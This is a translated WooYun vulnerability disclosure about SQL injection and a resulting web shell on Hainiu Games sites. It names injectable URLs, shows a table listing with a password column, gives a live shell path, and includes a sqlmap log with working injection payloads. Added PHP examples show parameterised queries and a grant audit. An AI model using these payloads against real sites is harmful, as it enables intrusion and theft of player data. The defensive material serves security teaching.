
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0144740

Title: Universal GETSHELL on all game sites under Hainiu, plus SQL injection that can leak massive amounts of user data

Vendor: 海牛游戏 (Hainiu Games)

Reporter: 路人甲

Submitted: 2015-10-04 14:43

Fix date: 2015-11-18 14:44

Disclosed: 2015-11-18 14:44

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags: (none)

Bookmarks: 4


Vulnerability details

Disclosure status:

2015-10-04: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2015-11-18: The vendor has actively ignored the vulnerability; details released to the public

Brief description:

Universal GETSHELL on all of Hainiu's game sites; SQL injection present; millions of user records leaked

Detailed description:

Hainiu Games official site: http://www.u591.com/
Every subdirectory of it is one of the company's games.
【First, the SQL injection】
Since the flaw is universal, just a few examples:
http://www.u591.com/sw/news.php?id=1634
http://www.u591.com/lw/news_list.php?TypeID=41
http://www.u591.com/tw/news_list.php?ntype=6
http://www.u591.com/newpay/index.php?game_id=2
【sqlmap screenshot】:

[Screenshot: 2.jpg]


【| u_player1 | 476085 | is the user table】 That is roughly 500,000 users; summed over all the games, at least several million users.
Database information:

Database: u591
+---------------------+---------
| Table | Entries
+---------------------+---------
| u_code_exchange | 3918025
| pay_log | 923359
| u_emoney1 | 889739
| u_player1 | 476085
| cpa | 330352
| u_delplayer1 | 241678
| u_delplayer13 | 234778
| u_delplayer8 | 204292
| u_delplayer16 | 102360
| account | 70736
| emoney1 | 65844
| u_emoney5 | 43306
| u_delplayer302 | 31632
| u_delplayer18 | 31613
| pay_sms | 23660
| u_emoney4 | 20247
| u_emoney2 | 17496
| u_emoney3 | 16719
| fenbaouser | 15749
| u_itemtype | 13137
| u_delplayer305 | 12886
| u_delplayer301 | 11044
| code_account | 11000
| u_delplayer19 | 8097
| lw_u_player1 | 6027
| code_log | 4114
| u_code_exchange_bak | 4056
| account_limit_log | 3640
| u_delplayer306 | 3376
| lw_u_delplayer1 | 3083
| news_data | 1545
| add_good | 887
| u_charts_player | 709
| u_card | 532
| lw_add_good | 244
| kf_message | 236
| key_value | 113
| pay_91 | 109
| kf_reply | 95
| news_class | 70
| client_data | 67
| account_ip_error | 56
| lw_u_vipgoods | 49
| change_pay_log | 33
| down_class | 24
| user_fenbao | 17
| link_data | 14
| admin_user | 8
| online_4399 | 6
| client_ver | 4
| idfa_app | 3
| publicity | 3
| artificial_vip | 2
| bug_message | 2
| sent_message | 2
| u_code_businesses | 2
| app_sent | 1
+---------------------+---------


Database: u591
Table: u_player1
[93 columns]
+-------------------+-------------------------------
| Column | Type
+-------------------+-------------------------------
| level | tinyint(1) unsigned
| position | tinyint(3) unsigned
| account | varchar(7)
| account_id | int(4) unsigned
| additional_point | smallint(2) unsigned
| attr | int(4) unsigned zerofill
| auto_exercise | tinyint(4) unsigned zerofill
| auto_point | tinyint(1) unsigned
| bfcrystal1 | int(4) unsigned
| bfcrystal2 | int(4) unsigned
| bfcrystal3 | int(4) unsigned
| big_badluck | tinyint(1) unsigned
| card_id | int(4) unsigned
| chk_sum | int(4) unsigned
| clan_proffer | int(4) unsigned
| coin_money | int(4) unsigned
| crystal_usage | int(4) unsigned
| current_life_max | int(4) unsigned
| dark_rate | tinyint(1)
| data_num | tinyint(1) unsigned zerofill
| Defense_point | smallint(2) unsigned
| dexiterity | smallint(2) unsigned
| dodge | smallint(2) unsigned
| earth_element | smallint(2) unsigned zerofill
| emoney | int(4) unsigned
| eud_bag_size | tinyint(1) unsigned
| eud_storage_limit | tinyint(1) unsigned
| exp | int(4) unsigned
| exp_ball_usage | smallint(2) unsigned
| ext_package_size | tinyint(1) unsigned
| extra_point | int(4) unsigned
| fire_element | smallint(2) unsigned zerofill
| fire_rate | tinyint(1)
| flower | int(4) unsigned
| geomancy | int(4) unsigned
| god_status | int(4) unsigned
| godexp | int(4) unsigned zerofill
| gold_element | smallint(2) unsigned zerofill
| governproffer | smallint(2) unsigned
| grid_amount | smallint(2) unsigned
| grid_lev | smallint(2) unsigned
| hair | smallint(2) unsigned
| health | smallint(2) unsigned
| holy_rate | tinyint(1)
| horse_bag_size | tinyint(1) unsigned
| ice_rate | tinyint(1)
| id | int(4) unsigned
| impart_num | int(4) unsigned
| intellect_point | smallint(2) unsigned
| last_login | int(8) unsigned
| last_logout | int(4) unsigned zerofill
| life | int(4) unsigned
| Life_point | smallint(2) unsigned
| lock_key | int(10) unsigned
| lookface | int(4) unsigned
| magic_atk | int(4) unsigned
| mana | smallint(2) unsigned
| marry_id | int(4) unsigned zerofill
| money | int(4) unsigned
| money_saved | int(4) unsigned
| mora | int(4) unsigned zerofill
| name | varchar(7)
| num_kill_small | int(4) unsigned
| old_prof | smallint(2) unsigned
| online_time | tinyint(4) unsigned zerofill
| password | varchar(7)
| pk | int(4)
| popularity | int(4) unsigned
| profession | tinyint(2) unsigned
| reborn_times | tinyint(1) unsigned
| recordmap_id | int(4) unsigned
| recordx | smallint(2) unsigned
| recordy | smallint(2) unsigned
| reserve_money | int(4) unsigned
| small_badluck | tinyint(1) unsigned
| soul | smallint(2) unsigned
| sp | smallint(2) unsigned
| Speed_point | smallint(2) unsigned
| stamina | smallint(2) unsigned
| storage_lev | tinyint(1) unsigned zerofill
| strength | smallint(2) unsigned
| strength_point | smallint(2) unsigned
| student_finished | int(4) unsigned
| syndicate_id | int(4) unsigned
| task_mask | int(4) unsigned zerofill
| thunder_rate | tinyint(1)
| title | int(4) unsigned
| vigor | smallint(2) unsigned
| vitality | smallint(2) unsigned
| water_element | smallint(2) unsigned zerofill
| wind_rate | tinyint(1)
| wood_element | smallint(2) unsigned zerofill
| workload | smallint(2) unsigned
+-------------------+-------------------------------
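The injectable endpoints listed above (news.php?id=, news_list.php?TypeID=, index.php?game_id=) all take a numeric identifier straight from the query string. The PHP below is an added example written for this page, not code from u591.com: it shows the typical vulnerable handler next to a hardened one. The news_data table appears in the sqlmap listing above; the columns id, title and content, the function names, and the use of mysqli in place of the legacy mysql_* functions are assumptions.

```php
<?php
// Added example for this page, not code from u591.com.
// Both handlers answer a request such as news.php?id=1634.
// news_data is a table from the report; columns id/title/content are assumed.

declare(strict_types=1);

// Never show driver or query errors to the client. A PHP warning that echoes
// a path like E:\wamp\www\... tells an attacker exactly where the web root is.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/**
 * Vulnerable form: the raw query-string value is concatenated into the SQL,
 * so "1634 AND SLEEP(5)" or "1634 UNION ALL SELECT ..." is executed as-is.
 */
function get_news_vulnerable(mysqli $db, array $get): array
{
    $sql = "SELECT id, title, content FROM news_data WHERE id = " . ($get['id'] ?? '');
    $res = $db->query($sql);
    return $res ? $res->fetch_all(MYSQLI_ASSOC) : [];
}

/**
 * Validate the identifier before it goes anywhere near the database.
 * Returns the integer, or null for anything that is not a plain positive int.
 */
function parse_news_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Hardened form: integer validation plus a prepared statement with a bound
 * parameter. The value can only ever be data, never part of the SQL text.
 */
function get_news_hardened(mysqli $db, array $get): array
{
    $id = parse_news_id($get['id'] ?? null);
    if ($id === null) {
        http_response_code(400);          // reject rather than guess
        return [];
    }

    $stmt = $db->prepare('SELECT id, title, content FROM news_data WHERE id = ?');
    if ($stmt === false) {
        error_log('news_data prepare failed: ' . $db->error); // logged, never displayed
        http_response_code(500);
        return [];
    }
    $stmt->bind_param('i', $id);          // 'i': bind as integer
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC); // get_result() needs mysqlnd
    $stmt->close();
    return $rows;
}

// The validator can be exercised offline, without a database:
// each of these is one of the payload shapes sqlmap used against the site.
var_dump(parse_news_id('1634'));
var_dump(parse_news_id('1634 AND 1530=1530'));
var_dump(parse_news_id('1634 AND SLEEP(5)'));
var_dump(parse_news_id('1634 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#'));
```

Only the first call yields an integer; the other three are rejected before any query is built. The prepared statement is the real control (the integer check is defence in depth for a parameter that is always numeric), and turning off display_errors closes the path-disclosure that the getshell step below relied on.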


【Now for the GETSHELL】
Because the account has DBA privileges:

[Screenshot: 1.jpg]


The SQL-injection error message reveals the web root: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in E:\wamp\www\www\inc\function.php on line 208
Using sqlmap's --os-shell gives a shell directly.

[Screenshot: 4.jpg]


Shell URL: http://www.u591.com:80/inc/tmpulkll.php
Because the injection is universal, so is the getshell; and because the games live in second-level directories, this yields a shell on the main official site directly.

Proof of vulnerability:

Full sqlmap run:
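The os-shell step worked only because the account the site connects with had DBA-level privileges, enough to write a file into the web root it had just learned from the error message. The following PHP is an added example, not the vendor's code: a small audit that parses the rows returned by SHOW GRANTS for a MySQL account and flags privileges that let an injection escalate beyond the database. The DANGEROUS_PRIVS list is my own selection, the grant strings at the bottom are constructed samples, and the account names root and webapp are illustrative.

```php
<?php
// Added example, not the vendor's code. Audits the rows returned by
// SHOW GRANTS FOR 'user'@'host' and flags privileges that let an SQL
// injection reach the filesystem or the server itself.
// Sample rows at the bottom are constructed; account names are illustrative.

declare(strict_types=1);

// Privileges a web application account should never hold (my selection).
// FILE allows SELECT ... INTO OUTFILE into the web root (how a shell gets
// written); SUPER / GRANT OPTION / ALL PRIVILEGES give control of the server.
const DANGEROUS_PRIVS = [
    'ALL PRIVILEGES', 'FILE', 'SUPER', 'GRANT OPTION',
    'SHUTDOWN', 'PROCESS', 'CREATE USER', 'RELOAD',
];

/**
 * Returns one finding per dangerous privilege; an empty list means the
 * account looks like a least-privilege application account.
 */
function audit_grants(array $grantRows): array
{
    $findings = [];
    foreach ($grantRows as $row) {
        // Shape: GRANT <privs> ON <scope> TO <user> [WITH GRANT OPTION ...]
        if (!preg_match('/^GRANT\s+(.+?)\s+ON\s+(\S+)\s+TO\s+(\S+)(.*)$/i', trim($row), $m)) {
            $findings[] = "unparsed grant row: $row";
            continue;
        }
        $privs = array_map('trim', explode(',', strtoupper($m[1])));
        $scope = $m[2];
        $user  = $m[3];
        if (stripos($m[4], 'WITH GRANT OPTION') !== false) {
            $privs[] = 'GRANT OPTION';
        }
        foreach (array_intersect($privs, DANGEROUS_PRIVS) as $p) {
            $findings[] = "$user holds $p on $scope";
        }
        // Anything beyond USAGE granted globally (*.*) is also out of place
        // for an account that should only touch its own schema.
        if ($scope === '*.*' && $privs !== ['USAGE']) {
            $findings[] = "$user has global scope (*.*): " . implode(', ', $privs);
        }
    }
    return $findings;
}

// Constructed samples: a DBA-style account of the kind the report implies,
// and the account a news site should actually connect with.
$dbaAccount = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
];
$appAccount = [
    "GRANT USAGE ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `u591`.* TO 'webapp'@'localhost'",
];

print_r(audit_grants($dbaAccount)); // flags the DBA-style account
print_r(audit_grants($appAccount)); // no findings for the schema-scoped account
```

To run it against a live account, feed it the rows of SHOW GRANTS FOR CURRENT_USER() executed through the same connection the web application uses. Two server-side settings complement the account hardening: secure_file_priv set to NULL (disables INTO OUTFILE and LOAD DATA entirely) or to a directory outside the web root, and display_errors=Off in PHP so query failures do not reveal paths such as E:\wamp\www.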

[11:58:51] [INFO] testing connection to the target URL
[11:58:52] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:58:53] [INFO] target URL is stable
[11:58:53] [INFO] testing if GET parameter 'id' is dynamic
[11:58:53] [INFO] confirming that GET parameter 'id' is dynamic
[11:58:53] [INFO] GET parameter 'id' is dynamic
[11:58:53] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:58:54] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[11:58:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:58:58] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:58:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:58:58] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[11:58:58] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[11:58:59] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:58:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[11:58:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[11:58:59] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[11:59:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[11:59:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:59:00] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[11:59:00] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[11:59:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:59:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:59:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:59:01] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:59:01] [INFO] testing 'MySQL inline queries'
[11:59:01] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:59:01] [WARNING] time-based comparison requires larger statistical model, please wait...
[11:59:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:59:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:59:13] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[11:59:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:59:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:59:13] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:59:14] [INFO] target URL appears to have 7 columns in query
[11:59:15] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1634 AND 1530=1530

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=1634 UNION ALL SELECT NULL,NULL,CONCAT(0x716b7a6271,0x704f4a50564871726d50,0x7178787071),NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1634 AND SLEEP(5)
---
[11:59:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0.11

Fix recommendations:

Copyright notice: when reproducing, please credit 路人甲@乌云


Vendor response

Vendor reply:

Unable to contact the vendor, or the vendor actively declined